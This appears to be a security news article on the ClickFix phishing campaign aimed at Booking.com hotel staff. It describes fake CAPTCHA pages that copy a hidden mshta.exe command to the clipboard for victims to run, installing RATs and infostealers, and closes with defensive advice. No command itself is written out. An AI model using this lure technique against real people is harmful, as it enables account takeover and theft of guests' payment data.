HQ/EMEAFind out how we can help your business
The persistent phishing operation dubbed ClickFix is targeting Booking.com to infect hospitality workers with malware, including RATs and infostealers.
By taking over employee accounts on the targeted platform, the threat actors try to steal consumer payment information and personal data, which they may then use to target visitors with other illicit activities.
The ClickFix phishing campaign has now reached the Booking.com platform.
The ClickFix social engineering campaign is a prevalent tactic among phishing operators right now. The campaign’s initiation strategy is to ask users to complete a “fix” or “captcha” to read content that contains fictitious mistakes on websites or in phishing documents.
The phishing operators send emails posing as visitors asking about a bad Booking.com review, requests from potential customers, account verification warnings, etc. These emails have an embedded button or a PDF attachment with a link directing the recipient to a phoney CAPTCHA page.
In ClickFix efforts, a fake CAPTCHA has gained popularity since it gives the process a false impression of validity to fool recipients into lowering their defences.
The campaign also uses a covert mshta.exe command that will be copied to the Windows clipboard to carry out the “human verification” procedure after solving the malicious CAPTCHA.
In carrying out the verification process, the target is instructed to launch the Windows Run command, copy the clipboard’s contents into the Run field, and then run it.
The victims are unaware that they are about to run a command on their system since they only see keyboard shortcuts, not the content transferred to the clipboard. As a result, less tech-savvy people are more prone to be deceived.
Furthermore, Microsoft claims that the copied code in this campaign is mshta.exe, which runs a malicious HTML page on the attacker’s server.
The program downloads and installs many remote access trojans and information-stealing malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
Users should constantly validate the integrity of the sender’s address, exercise caution when confronted with urgent requests to action, and look for errors that could reveal scammers to protect against these attacks.
